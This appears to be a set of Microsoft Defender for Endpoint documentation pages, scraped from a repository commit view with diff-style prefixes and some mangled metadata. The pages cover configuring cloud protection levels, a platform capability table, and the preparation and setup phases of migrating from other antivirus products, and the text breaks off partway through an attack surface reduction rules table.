-Cloud protection works together with Microsoft Defender Antivirus to deliver protection to your devices faster than through traditional security intelligence updates. You can configure your level of cloud protection by using Microsoft Intune (recommended) or Group Policy.
-
-## Use Microsoft Intune to specify the level of cloud protection
-
-1. Go to the Microsoft Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and sign in.
-
-2. Choose **Endpoint security** \> **Antivirus**.
-
-3. Select an antivirus profile. If you don't have one yet, or if you want to create a new profile, see [Configure device restriction settings in Microsoft Intune](/intune/device-restrictions-configure).
-
-4. Select **Properties**. Then, next to **Configuration settings**, choose **Edit**.
-
-5. Expand **Cloud protection**, and then in the **Cloud-delivered protection level** list, select one of the following:
-
- - **Not configured**: Default state.
- - **High**: Applies a strong level of detection.
- - **High plus**: Uses the **High** level and applies extra protection measures (might affect client performance).
- - **Zero tolerance**: Blocks all unknown executables.
-
-6. Choose **Review + save**, and then choose **Save**.
-
-> [!TIP]
-> Need some help? See the following resources:
->
-> - [Manage device security with endpoint security policies in Microsoft Intune](/mem/intune/protect/endpoint-security-policy)
-> - [Configure Endpoint Protection](/mem/configmgr/protect/deploy-use/endpoint-protection-configure) (Configuration Manager)
-
-## Use Group Policy to specify the level of cloud protection
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)).
-
-2. Right-click the Group Policy Object you want to configure, and then select **Edit**.
-
-3. In the **Group Policy Management Editor**, go to **Computer Configuration** \> **Administrative templates**.
-
-4. Expand the tree to **Windows Components** \> **Microsoft Defender Antivirus** \> **MpEngine**.
-
-5. Double-click the **Select cloud protection level** setting, and set it to **Enabled**.
-
-6. Under **Select cloud blocking level**, set the level of protection:
-
- - **Default blocking level** provides strong detection without increasing the risk of detecting legitimate files.
- - **Moderate blocking level** provides moderate only for high confidence detections
- - **High blocking level** applies a strong level of detection while optimizing client performance (but can also give you a greater chance of false positives).
- - **High + blocking level** applies extra protection measures (might affect client performance and increase your chance of false positives).
- - **Zero tolerance blocking level** blocks all unknown executables.
-
- > [!CAUTION]
- > If you're using [Resultant Set of Policy with Group Policy](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn789183(v=ws.11)) (RSOP), and **Default blocking level** is selected, it can produce misleading results, as a setting with a `0` value is read as disabled by RSOP. You can instead confirm the registry key is present in `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine` or use [GPresult](/windows-server/administration/windows-commands/gpresult).
-
-7. Select **OK**.
-
-8. Deploy your updated Group Policy Object. See [Group Policy Management Console](/windows/win32/srvnodes/group-policy)
-
-> [!TIP]
-> Are you using Group Policy Objects on premises? See how they translate in the cloud. [Analyze your on-premises group policy objects using Group Policy analytics in Microsoft Intune](/mem/intune/configuration/group-policy-analytics).
-
-## See also
--- [Onboard non-Windows devices to Defender for Endpoint](configure-endpoints-non-windows.md)-- [Turn on cloud protection in Microsoft Defender Antivirus](enable-cloud-protection-microsoft-defender-antivirus.md)
security Supported Capabilities By Platform https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/supported-capabilities-by-platform.md
- Title: Supported Microsoft Defender for Endpoint capabilities by platform
-description: Get to know the Microsoft Defender for Endpoint capabilities supported for Windows 10 devices, servers, and non-Windows devices.
------- m365-security-- tier2-- Previously updated : 08/26/2022--
-# Supported Microsoft Defender for Endpoint capabilities by platform
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-onboardconfigure-abovefoldlink)
-
-Learn how to [Onboard devices and configure Microsoft Defender for Endpoint capabilities](onboard-configure.md).
-
-The following table gives information about the supported Microsoft Defender for Endpoint capabilities by platform.
-
-|Operating System|Windows 10 & 11|Windows Server 2012 R2 <sup>[1]</sup>, <br> 2016 <sup>[1]</sup>, <br> 2019 & 2022, <br> 1803+|macOS|Linux|
-||::|::|::|::|
-|**Prevention**|||||
-|[Attack Surface Reduction](attack-surface-reduction.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![No](media/svg/check-no.svg)|![No](media/svg/check-no.svg)|
-|Device Control|![Yes.](media/svg/check-yes.svg)|![No](media/svg/check-no.svg)|![Yes.](media/svg/check-yes.svg)|![No](media/svg/check-no.svg)|
-|[Firewall](host-firewall-reporting.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![No](media/svg/check-no.svg)|![No](media/svg/check-no.svg)|
-|[Network Protection](network-protection.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg) <sup>[2]</sup>|![Yes.](media/svg/check-yes.svg) <sup>[2]</sup>|
-|[Next-generation protection](next-generation-protection.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|
-|[Tamper Protection](prevent-changes-to-security-settings-with-tamper-protection.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![No](media/svg/check-no.svg)|
-|[Web Protection](web-protection-overview.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg) <sup>[2]</sup>|![Yes.](media/svg/check-yes.svg) <sup>[2]</sup>|
-||||||
-|**Detection**|||||
-|[Advanced Hunting](../defender/advanced-hunting-overview.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|
-|[Custom file indicators](indicator-file.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|
-|[Custom network indicators](indicator-ip-domain.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg) <sup>[2]</sup>|![Yes.](media/svg/check-yes.svg) <sup>[2]</sup>|
-|[EDR Block](edr-in-block-mode.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![No](media/svg/check-no.svg)|![No](media/svg/check-no.svg)|
-|[Passive Mode](microsoft-defender-antivirus-compatibility.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|
-|Sense detection sensor|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|
-|Endpoint & network device discovery|![Yes.](media/svg/check-yes.svg)|![No](media/svg/check-no.svg)|![No](media/svg/check-no.svg)|![No](media/svg/check-no.svg)|
-|[Vulnerability management](../defender-vulnerability-management/defender-vulnerability-management.md)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|![Yes.](media/svg/check-yes.svg)|
-||||||
-|**Response** | | | ||
-|[Automated Investigation & Response (AIR)](automated-investigations.md) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) | ![No](media/svg/check-no.svg) | ![No](media/svg/check-no.svg) |
-|[Device response capabilities: collect investigation package ](respond-machine-alerts.md) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) <sup>[3]</sup> | ![Yes.](media/svg/check-yes.svg) <sup>[3]</sup> |
-|[Device response capabilities: run AV scan](respond-machine-alerts.md) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) |
-|[Device isolation](respond-machine-alerts.md) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) |
-|File response capabilities: collect file, deep analysis, block file, stop, and quarantine processes | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) | ![No](media/svg/check-no.svg) | ![No](media/svg/check-no.svg) |
-|[Live Response](live-response.md) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) | ![Yes.](media/svg/check-yes.svg) |
-
-<sup>[1]</sup> Refers to the modern, unified solution for Windows Server 2012 R2 and 2016. For more information, see [Onboard Windows Servers to the Defender for Endpoint service](configure-server-endpoints.md).
-
-<sup>[2]</sup> Feature is currently in preview ([Microsoft Defender for Endpoint preview features](preview.md))
-
-<sup>[3]</sup> Response capabilities using Live Response [2]
-
-<sup>[4]</sup> Collect file only, using Live Response [2]
-
-> [!NOTE]
-> Windows 7, 8.1, Windows Server 2008 R2 include support for the EDR sensor, and AV using System Center Endpoint Protection (SCEP).
-
security Switch To Mde Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-overview.md
- Title: Migrate to Microsoft Defender for Endpoint from non-Microsoft endpoint protection
-description: Move to Microsoft Defender for Endpoint, which includes Microsoft Defender Antivirus for your endpoint protection solution.
------- m365-security-- m365solution-migratetomdatp-- m365solution-overview-- m365initiative-defender-endpoint-- highpri-- tier1-- Previously updated : 10/24/2023----
-# Migrate to Microsoft Defender for Endpoint from non-Microsoft endpoint protection
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-If you're ready to move from a non-Microsoft endpoint protection solution to [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md), or you're interested in what all is involved in the process, use this article as a guide. This article describes the overall process of moving to [Defender for Endpoint Plan 1 or Plan 2](microsoft-defender-endpoint.md). The following image depicts the migration process at a high level:
--
-When you migrate to Defender for Endpoint, you begin with your non-Microsoft antivirus/antimalware protection in active mode. Then, you configure Microsoft Defender Antivirus in passive mode, and configure Defender for Endpoint features. Then, you onboard your organization's devices, and verify that everything is working correctly. Finally, you remove the non-Microsoft solution from your devices.
-
-## The migration process
--
-The process of migrating to Defender for Endpoint can be divided into three phases, as described in the following table:
-
-|Phase|Description|
-|--|--|
-|[Prepare for your migration](switch-to-mde-phase-1.md)|During [the **Prepare** phase](switch-to-mde-phase-1.md): <br/>1. Update your organization's devices.<br/>2. Get Defender for Endpoint Plan 1 or Plan 2.<br/>3. Plan roles and permissions for your security team, and grant them access to the Microsoft Defender portal.<br/>4. Configure your device proxy and internet settings to enable communication between your organization's devices and Defender for Endpoint.<br/>5. Get baseline performance data for the devices that are onboarded to Defender for Endpoint. |
-|[Set up Defender for Endpoint](switch-to-mde-phase-2.md)|During [the **Setup** phase](switch-to-mde-phase-2.md): <br/>1. Enable/reinstall Microsoft Defender Antivirus, and make sure it's in passive mode on devices.<br/>2. Configure your Defender for Endpoint Plan 1 or Plan 2 capabilities.<br/>3. Add Defender for Endpoint to the exclusion list for your existing solution.<br/>4. Add your existing solution to the exclusion list for Microsoft Defender Antivirus.<br/>5. Set up your device groups, collections, and organizational units.|
-|[Onboard to Defender for Endpoint](switch-to-mde-phase-3.md)|During [the **Onboard** phase](switch-to-mde-phase-3.md): <br/>1. Onboard your devices to Defender for Endpoint.<br/>2. Run a detection test to confirm that onboarding was successful.<br/>3. Confirm that Microsoft Defender Antivirus is running in passive mode.<br/>4. Get updates for Microsoft Defender Antivirus.<br/>5. Uninstall your existing endpoint protection solution.<br/>6. Make sure that Defender for Endpoint working correctly.|
-
-## Next step
--- Proceed to [Prepare for your migration](switch-to-mde-phase-1.md).
security Switch To Mde Phase 1 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-phase-1.md
- Title: Migrate to Microsoft Defender for Endpoint - Prepare
-description: Get ready to move to Microsoft Defender for Endpoint. Update your devices and configure your network connections.
------
- - m365-security
- - m365solution-migratetomdatp
- - highpri
- - tier1
---- migrationguides-- admindeeplinkDEFENDER Previously updated : 10/24/2023---
-# Migrate to Microsoft Defender for Endpoint - Phase 1: Prepare
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-| ![Phase 1: Prepare.](medi) |
-|--|--|--|
-|*You're here!*| | |
-
-**Welcome to the Prepare phase of [migrating to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)**.
-
-This migration phase includes the following steps:
-
-1. [Get and deploy updates across your organization's devices](#step-1-get-and-deploy-updates-across-your-organizations-devices).
-2. [Get Microsoft Defender for Endpoint Plan 1 or Plan 2](#step-2-get-microsoft-defender-for-endpoint-plan-1-or-plan-2).
-3. [Grant access to the Microsoft Defender portal](#step-3-grant-access-to-the-microsoft-365-defender-portal).
-4. [Review more information about device proxy and internet connectivity settings](#step-4-view-information-about-device-proxy-and-internet-connectivity-settings).
-5. [Capture performance baseline data from the endpoint](#step-5-capture-performance-baseline-data-from-the-endpoint)
-
-## Step 1: Get and deploy updates across your organization's devices
-
-As a best practice, keep your organization's devices and endpoints up to date. Make sure your existing endpoint protection and antivirus solution is up to date, and that your organization's operating systems and apps also have the latest updates. Getting updates installed now can help prevent problems later as you migrate to Defender for Endpoint and employ Microsoft Defender Antivirus on all your devices.
-
-### Make sure your existing solution is up to date
-
-Keep your existing endpoint protection solution up to date, and make sure that your organization's devices have the latest security updates. Make sure to review your solution provider's documentation for updates.
-
-### Make sure your organization's devices are up to date
-
-Need help with updating your organization's devices? See the following resources:
-
-|OS|Resource|
-|||
-|Windows|[Microsoft Update](/windows/deployment/update/how-windows-update-works)|
-|macOS|[How to update the software on your Mac](https://support.apple.com/HT201541)|
-|iOS|[Update your iPhone, iPad, or iPod touch](https://support.apple.com/HT204204)|
-|Android|[Check & update your Android version](https://support.google.com/android/answer/7680439)|
-|Linux|[Linux 101: Updating Your System](https://www.linux.com/training-tutorials/linux-101-updating-your-system)|
-
-## Step 2: Get Microsoft Defender for Endpoint Plan 1 or Plan 2
-
-Now that you've updated your organization's devices, the next step is to get Defender for Endpoint, assign licenses, and make sure the service is provisioned.
-
-1. Buy or try Defender for Endpoint today. [Start a free trial or request a quote](https://aka.ms/mdatp). Microsoft 365 E3 includes Defender for Endpoint Plan 1, and Microsoft 365 E5 includes Defender for Endpoint Plan 2.
-
-2. Verify that your licenses are properly provisioned. [Check your license state](production-deployment.md#check-license-state).
-
-3. Set up your dedicated cloud instance of Defender for Endpoint. See [Defender for Endpoint setup: Tenant configuration](production-deployment.md#tenant-configuration).
-
-4. If any devices in your organization use a proxy to access the internet, follow the guidance in [Defender for Endpoint setup: Network configuration](production-deployment.md#network-configuration).
-
-At this point, you're ready to grant access to your security administrators and security operators to use the [Microsoft Defender portal](https://security.microsoft.com).
-
-<a name='step-3-grant-access-to-the-microsoft-365-defender-portal'></a>
-
-## Step 3: Grant access to the Microsoft Defender portal
-
-The [Microsoft Defender portal](https://security.microsoft.com) is where you and your security team access and configure features and capabilities of Defender for Endpoint. To learn more, see [Overview of the Microsoft Defender portal](use.md).
-
-Permissions to the Microsoft Defender portal can be granted by using either basic permissions or role-based access control (RBAC). We recommend using RBAC so that you have more granular control over permissions.
-
-1. Plan the roles and permissions for your security administrators and security operators. See [Role-based access control](prepare-deployment.md#role-based-access-control).
-
-2. Set up and configure RBAC. We recommend using [Intune](/mem/intune/fundamentals/what-is-intune) to configure RBAC, especially if your organization is using a combination of Windows, macOS, iOS, and Android devices. See [setting up RBAC using Intune](/mem/intune/fundamentals/role-based-access-control).
-
- If your organization requires a method other than Intune, choose one of the following options:
-
- - [Configuration Manager](/mem/configmgr/core/servers/deploy/configure/configure-role-based-administration)
- - [Advanced Group Policy Management](/microsoft-desktop-optimization-pack/agpm)
- - [Windows Admin Center](/windows-server/manage/windows-admin-center/overview)
-
-3. Grant your security team access to the Microsoft Defender portal. (Need help? See [Manage portal access using RBAC](rbac.md).
-
-## Step 4: View information about device proxy and internet connectivity settings
-
-To enable communication between your devices and Defender for Endpoint, you might have to configure proxy and internet settings. The following table includes links to resources you can use to configure your proxy and internet settings for various operating systems:
-
-|Subscription| Operating systems |Resources|
-||||
-|[Defender for Endpoint Plan 1](defender-endpoint-plan-1.md)|[Windows 11](/windows/whats-new/windows-11-overview)<br/>[Windows 10](/windows/release-health/release-information)<br/> [Windows Server 2022](/windows-server/get-started/whats-new-in-windows-server-2022) <br/> [Windows Server 2019](/windows/release-health/status-windows-10-1809-and-windows-server-2019) <br/> [Windows Server 1803, or later](/windows-server/get-started/whats-new-in-windows-server-1803) <br/> [Windows Server 2016](/windows-server/get-started/whats-new-in-windows-server-2016)\*<br/>[Windows Server 2012 R2](/windows/release-health/status-windows-8.1-and-windows-server-2012-r2)\* |[Configure and validate Microsoft Defender Antivirus network connections](configure-network-connections-microsoft-defender-antivirus.md)|
-|[Defender for Endpoint Plan 1](defender-endpoint-plan-1.md)|macOS (see [System requirements](microsoft-defender-endpoint-mac.md))|[Defender for Endpoint on macOS: Network connections](microsoft-defender-endpoint-mac.md#network-connections)|
-|[Defender for Endpoint Plan 1](defender-endpoint-plan-1.md)|Linux (see [System requirements](microsoft-defender-endpoint-linux.md#system-requirements))|[Defender for Endpoint on Linux: Network connections](microsoft-defender-endpoint-linux.md#network-connections)|
-|[Defender for Endpoint Plan 2](microsoft-defender-endpoint.md)|[Windows 11](/windows/whats-new/windows-11-overview)<br/>[Windows 10](/windows/release-health/release-information)<br/>[Windows Server 2022](/windows-server/get-started/whats-new-in-windows-server-2022) <br/>[Windows Server 2019](/windows/release-health/status-windows-10-1809-and-windows-server-2019) <br/>[Windows Server 1803, or later](/windows-server/get-started/whats-new-in-windows-server-1803) <br/>[Windows Server 2016](/windows/release-health/status-windows-10-1607-and-windows-server-2016)\* <br/>[Windows Server 2012 R2](/windows/release-health/status-windows-8.1-and-windows-server-2012-r2)\* |[Configure machine proxy and internet connectivity settings](configure-proxy-internet.md)|
-|[Defender for Endpoint Plan 2](microsoft-defender-endpoint.md) |[Windows Server 2008 R2 SP1](/windows/release-health/status-windows-7-and-windows-server-2008-r2-sp1) <br/>[Windows 8.1](/windows/release-health/status-windows-8.1-and-windows-server-2012-r2)<br/>[Windows 7 SP1](/windows/release-health/status-windows-7-and-windows-server-2008-r2-sp1)|[Configure proxy and internet connectivity settings](onboard-downlevel.md#configure-proxy-and-internet-connectivity-settings)|
-|[Defender for Endpoint Plan 2](microsoft-defender-endpoint.md)|macOS (see [System requirements](microsoft-defender-endpoint-mac.md))|[Defender for Endpoint on macOS: Network connections](microsoft-defender-endpoint-mac.md#network-connections)|
-
-\* Windows Server 2016 and Windows Server 2012 R2 require installation of the modern, unified solution for Windows Server 2012 R2 and 2016. For more information, see [Onboard Windows servers to Defender for Endpoint: Windows Server 2012 R2 and Windows Server 2016](/microsoft-365/security/defender-endpoint/configure-server-endpoints#windows-server-2012-r2-and-windows-server-2016).
-
-> [!IMPORTANT]
-> The standalone versions of Defender for Endpoint Plan 1 and Plan 2 do not include server licenses. To onboard servers, you'll need an additional license, such as either [Microsoft Defender for Servers Plan 1 or Plan 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan). To learn more, see [Defender for Endpoint onboarding Windows Server](onboard-windows-server.md).
-
-## Step 5: Capture performance baseline data from the endpoint
-
-When migrating from one antivirus product to Microsoft Defender Antivirus, your organization's Help Desk's eyes are on what's new. Thus, if you already had an application that was running hot (high cpu usage), their first troubleshooting step might be to disable Microsoft Defender Antivirus. Before doing that, we highly recommend capturing performance data from endpoints that have or will have Defender for Endpoint installed.
-
-Performance data should include the process list, CPU usage (aggregate across all cores), memory usage, and disk space availability on all mounted partitions. This information helps determine whether what you are seeing is normal or unexpected after onboarding devices to Defender for Endpoint.
-
-One of the tools that you can use is the Performance Monitor (perfmon). You can use it to collect a performance baseline of your Windows or Windows Server endpoint. See [Setting a local perfmon in a Windows client or Windows Server](/archive/blogs/yongrhee/setting-a-local-perfmon-in-a-windows-client-or-windows-server).
-
-## Next step
-
-**Congratulations**! You've completed the **Prepare** phase of [switching to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)!
--- [Proceed to set up Defender for Endpoint](switch-to-mde-phase-2.md).
security Switch To Mde Phase 2 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-phase-2.md
- Title: Migrate to Microsoft Defender for Endpoint - Setup
-description: Move to Defender for Endpoint. Review the setup process, which includes installing Microsoft Defender Antivirus.
---- Previously updated : 10/24/2023--
- - m365-security
- - m365solution-migratetomdatp
- - m365solution-mcafeemigrate
- - m365solution-symantecmigrate
- - highpri
- - tier1
-----
-# Migrate to Microsoft Defender for Endpoint - Phase 2: Setup
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-|[![Phase 1: Prepare.](medi)|
-||||
-||*You're here!*||
-
-**Welcome to the Setup phase of [migrating to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)**. This phase includes the following steps:
-
-1. [Reinstall/enable Microsoft Defender Antivirus on your endpoints](#step-1-reinstallenable-microsoft-defender-antivirus-on-your-endpoints).
-2. [Configure Defender for Endpoint Plan 1 or Plan 2](#step-2-configure-defender-for-endpoint-plan-1-or-plan-2)
-3. [Add Defender for Endpoint to the exclusion list for your existing solution](#step-3-add-microsoft-defender-for-endpoint-to-the-exclusion-list-for-your-existing-solution).
-4. [Add your existing solution to the exclusion list for Microsoft Defender Antivirus](#step-4-add-your-existing-solution-to-the-exclusion-list-for-microsoft-defender-antivirus).
-5. [Set up your device groups, device collections, and organizational units](#step-5-set-up-your-device-groups-device-collections-and-organizational-units).
-
-## Step 1: Reinstall/enable Microsoft Defender Antivirus on your endpoints
-
-On certain versions of Windows, Microsoft Defender Antivirus was likely uninstalled or disabled when your non-Microsoft antivirus/antimalware solution was installed. When endpoints running Windows are onboarded to Defender for Endpoint, Microsoft Defender Antivirus can run in passive mode alongside a non-Microsoft antivirus solution. To learn more, see [Antivirus protection with Defender for Endpoint](microsoft-defender-antivirus-compatibility.md#antivirus-protection-without-defender-for-endpoint).
-
-As you're making the switch to Defender for Endpoint, you might need to take certain steps to reinstall or enable Microsoft Defender Antivirus. The following table describes what to do on your Windows clients and servers.
-
-|Endpoint type|What to do|
-|||
-|Windows clients (such as endpoints running Windows 10 and Windows 11)|In general, you don't need to take any action for Windows clients (unless Microsoft Defender Antivirus has been uninstalled). In general, Microsoft Defender Antivirus should still be installed, but is most likely disabled at this point of the migration process. <br/><br/> When a non-Microsoft antivirus/antimalware solution is installed and the clients aren't yet onboarded to Defender for Endpoint, Microsoft Defender Antivirus is disabled automatically. Later, when the client endpoints are onboarded to Defender for Endpoint, if those endpoints are running a non-Microsoft antivirus solution, Microsoft Defender Antivirus goes into passive mode. <br/><br/> If the non-Microsoft antivirus solution is uninstalled, Microsoft Defender Antivirus goes into active mode automatically.|
-|Windows servers|On Windows Server, you need to reinstall Microsoft Defender Antivirus, and set it to passive mode manually. On Windows servers, when a non-Microsoft antivirus/antimalware is installed, Microsoft Defender Antivirus can't run alongside the non-Microsoft antivirus solution. In those cases, Microsoft Defender Antivirus is disabled or uninstalled manually. <br/><br/> To reinstall or enable Microsoft Defender Antivirus on Windows Server, perform the following tasks: <br/>- [Re-enable Defender Antivirus on Windows Server if it was disabled](enable-update-mdav-to-latest-ws.md#re-enable-microsoft-defender-antivirus-on-windows-server-if-it-was-disabled)<br/>- [Re-enable Defender Antivirus on Windows Server if it was uninstalled](enable-update-mdav-to-latest-ws.md#re-enable-microsoft-defender-antivirus-on-windows-server-if-it-was-uninstalled)<br/>- [Set Microsoft Defender Antivirus to passive mode on Windows Server](#set-microsoft-defender-antivirus-to-passive-mode-on-windows-server) <br/><br/>If you run into issues reinstalling or re-enabling Microsoft Defender Antivirus on Windows Server, see [Troubleshooting: Microsoft Defender Antivirus is getting uninstalled on Windows Server](switch-to-mde-troubleshooting.md#microsoft-defender-antivirus-is-getting-uninstalled-on-windows-server).|
-
-> [!TIP]
-> To learn more about Microsoft Defender Antivirus states with non-Microsoft antivirus protection, see [Microsoft Defender Antivirus compatibility](microsoft-defender-antivirus-compatibility.md).
-
-### Set Microsoft Defender Antivirus to passive mode on Windows Server
-
-> [!TIP]
-> You can now run Microsoft Defender Antivirus in passive mode on Windows Server 2012 R2 and 2016. For more information, see [Options to install Microsoft Defender for Endpoint](configure-server-endpoints.md#options-to-install-the-microsoft-defender-for-endpoint-packages).
-
-1. Open Registry Editor, and then navigate to `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection`.
-
-2. Edit (or create) a DWORD entry called **ForceDefenderPassiveMode**, and specify the following settings:
-
- - Set the DWORD's value to **1**.
-
- - Under **Base**, select **Hexadecimal**.
-
-If Microsoft Defender Antivirus features and installation files were previously removed from Windows Server 2016, follow the guidance in [Configure a Windows Repair Source](/windows-hardware/manufacture/desktop/configure-a-windows-repair-source) to restore the feature installation files.
-
-> [!NOTE]
-> After onboarding to Defender for Endpoint, you might have to set Microsoft Defender Antivirus to passive mode on Windows Server. To validate that passive mode was set as expected, search for **Event 5007** in the **Microsoft-Windows-Windows Defender Operational** log (located at `C:\Windows\System32\winevt\Logs`), and confirm that either the **ForceDefenderPassiveMode** or **PassiveMode** registry keys were set to **0x1**.
-
-### Are you using Windows Server 2012 R2 or Windows Server 2016?
-
-You can now run Microsoft Defender Antivirus in passive mode on Windows Server 2012 R2 and 2016 using the method described in the previous section. For more information, see [Options to install Microsoft Defender for Endpoint](configure-server-endpoints.md#options-to-install-the-microsoft-defender-for-endpoint-packages).
-
-## Step 2: Configure Defender for Endpoint Plan 1 or Plan 2
-
-> [!IMPORTANT]
-> - This article describes how to configure your Defender for Endpoint capabilities before devices are onboarded.
-> - If you have Defender for Endpoint Plan 1, complete steps 1-5 in the following procedure.
-> - If you have Defender for Endpoint Plan 2, complete steps 1-7 in the following procedure.
-
-1. Make sure Defender for Endpoint is provisioned. As a global admin, go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in. Then, in the navigation pane, select **Assets** > **Devices**.
-
- The following table shows what your screen might look like and what it means.
-
- | Screen | What it means |
- ||:|
- | :::image type="content" source="medie-hangon-provisioning.png"::: | Defender for Endpoint isn't finished provisioning yet. You might have to wait a little while for the process to finish. |
- | :::image type="content" source="media/device-inventory-empty.png" alt-text="Screenshot showing device inventory page with no device onboarded yet." lightbox="media/device-inventory-empty.png"::: | Defender for Endpoint is provisioned. In this case, proceed to the next step. |
-
-2. Turn on [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md). We recommend turning tamper protection on for your whole organization. You can do this task in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)).
-
- 1. In the Microsoft Defender portal, choose **Settings** > **Endpoints**.
-
- 2. Go to **General** > **Advanced features**, and then set the toggle for tamper protection to **On**.
-
- 3. Select **Save**.
-
- [Learn more about tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md).
-
-3. If you're going to use either [Microsoft Intune](/mem/intune/fundamentals/what-is-intune) or [Microsoft Endpoint Configuration Manager](/mem/endpoint-manager-overview) to onboard devices and configure device policies, set up integration with Defender for Endpoint by following these steps: <br/>
-
- 1. In the Microsoft Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)), go to **Endpoint security**.
-
- 2. Under **Setup**, choose **Microsoft Defender for Endpoint**.
-
- 3. Under **Endpoint Security Profile Settings**, set the toggle for **Allow Microsoft Defender for Endpoint to enforce Endpoint Security Configurations** to **On**.
-
- 4. Near the top of the screen, select **Save**.
-
- 5. In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), choose **Settings** > **Endpoints**.
-
- 6. Scroll down to **Configuration management**, and select **Enforcement scope**.
-
- 7. Set the toggle for **Use MDE to enforce security configuration settings from MEM** to **On**, and then select the options for both Windows client and Windows Server devices.
-
- 8. If you're planning to use Configuration Manager, set the toggle for **Manage Security settings using Configuration Manager** to **On**. (If you need help with this step, see [Coexistence with Microsoft Endpoint Configuration Manager](/mem/intune/protect/mde-security-integration#co-existence-with-microsoft-endpoint-configuration-manager).)
-
- 9. Scroll down and select **Save**.
-
-4. Configure your initial [attack surface reduction capabilities](overview-attack-surface-reduction.md). At a minimum, enable the standard protection rules that are listed in the following table right away:
-
- | Standard protection rules | Configuration methods |
- |:|:|
